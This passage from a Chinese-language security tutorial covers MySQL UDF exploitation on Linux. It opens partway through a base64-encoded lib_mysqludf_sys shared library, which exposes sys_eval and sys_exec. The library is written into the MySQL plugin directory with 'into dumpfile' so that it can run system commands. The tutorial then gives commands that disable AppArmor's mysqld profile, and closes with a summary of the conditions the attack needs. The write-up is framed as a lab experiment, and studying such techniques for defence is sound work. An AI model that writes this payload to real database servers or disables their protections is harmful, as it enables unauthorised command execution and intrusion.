mZ2V0c0BAR0xJQkNfMi4yLjUAc3lzX2V2YWwAc3lzX2dldABfX2dtb25fc3RhcnRfXwBzeXNfc2V0AG1lbWNweUBAR0xJQkNfMi4xNABsaWJfbXlzcWx1ZGZfc3lzX2luZm8AbWFsbG9jQEBHTElCQ18yLjIuNQBsaWJfbXlzcWx1ZGZfc3lzX2luZm9fZGVpbml0AHN5c19zZXRfaW5pdABfZW5kAHN5c19ldmFsX2RlaW5pdAByZWFsbG9jQEBHTElCQ18yLjIuNQBfX2Jzc19zdGFydABwb3BlbkBAR0xJQkNfMi4yLjUAc3lzX3NldF9kZWluaXQAc3lzX2V4ZWNfZGVpbml0AHN5c19ldmFsX2luaXQAc3lzX2dldF9pbml0AF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AGxpYl9teXNxbHVkZl9zeXNfaW5mb19pbml0AAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5ub3RlLmdudS5idWlsZC1pZAAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsYS5keW4ALnJlbGEucGx0AC5pbml0AC5wbHQuZ290AC50ZXh0AC5maW5pAC5yb2RhdGEALmVoX2ZyYW1lX2hkcgAuZWhfZnJhbWUALmluaXRfYXJyYXkALmZpbmlfYXJyYXkALmR5bmFtaWMALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v//bwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAALQAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAAKgCAAAAAAAAqAIAAAAAAACQAwAAAAAAAAQAAAABAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAAA4BgAAAAAAADgGAAAAAAAA5QEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA////bwIAAAAAAAAAHggAAAAAAAAeCAAAAAAAAEwAAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7//28CAAAAAAAAAHAIAAAAAAAAcAgAAAAAAABAAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAACwCAAAAAAAALAIAAAAAAAAqAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAWAkAAAAAAABYCQAAAAAAADgBAAAAAAAAAwAAABUAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAAJAKAAAAAAAAkAoAAAAAAAAXAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAACwCgAAAAAAALAKAAAAAAAA4AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB+AAAAAQAAAAYAAAAAAAAAkAsAAAAAAACQCwAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAhwAAAAEAAAAGAAAAAAAAAKALAAAAAAAAoAsAAAAAAABWCAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAI0AAAABAAAABgAAAAAAAAD4EwAAAAAAAPgTAAAAAAAACQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACTAAAAAQAAAAIAAAAAAAAAARQAAAAAAAABFAAAAAAAAAIAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAmwAAAAEAAAACAAAAAAAAAAQUAAAAAAAABBQAAAAAAACUAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAKkAAAABAAAAAgAAAAAAAACYFAAAAAAAAJgUAAAAAAAAPAIAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACzAAAADgAAAAMAAAAAAAAAEB4gAAAAAAAQHgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAvwAAAA8AAAADAAAAAAAAABgeIAAAAAAAGB4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAMsAAAAGAAAAAwAAAAAAAAAgHiAAAAAAACAeAAAAAAAAwAEAAAAAAAAEAAAAAAAAAAgAAAAAAAAAEAAAAAAAAACCAAAAAQAAAAMAAAAAAAAA4B8gAAAAAADgHwAAAAAAACAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA1AAAAAEAAAADAAAAAAAAAAAgIAAAAAAAACAAAAAAAACAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAN0AAAABAAAAAwAAAAAAAACAICAAAAAAAIAgAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADjAAAACAAAAAMAAAAAAAAAiCAgAAAAAACIIAAAAAAAAAgAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA6AAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAiCAAAAAAAAApAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAALggAAAAAAAAaAcAAAAAAAAaAAAAKgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAgKAAAAAAAAHADAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAkCsAAAAAAADxAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA==" into dumpfile "/usr/lib/mysql/plugin/mysqludf.so"
接着就能使用udf执行命令了
同样会因为apparmor无法执行命令,所以需要绕过
apparmor
上面命令执行不成功主要是涉及到apparmor。自Feisty版本发行以来,Ubuntu以软件包的形式提供,自Gutsy版本发行以来,Ubuntu默认运行。apparmor是ubuntu的一个用来限制程序行为的一个强制访问系统。其实就是不让你执行一些命令。那我们既然是做实验就把他关了吧。
执行下面的命令
sudo ln -s /etc/apparmor.d/usr.sbin.mysqld /etc/apparmor.d/disable/
sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld
然后重启mysql,
sudo service mysql restart
再执行命令就行了。
执行whoami,用户为mysql,没有提到root
总结
linux下想通过udf来getshell或提权要满足以下条件:
- secure_file_priv要为空或者至少为plugin_dir所在目录
- plugin_dir目录下需要有写的权限,而该目录默认没有写权限。
即使udf提权提权成功,执行whoami得到的结果也是mysql,不能提权到root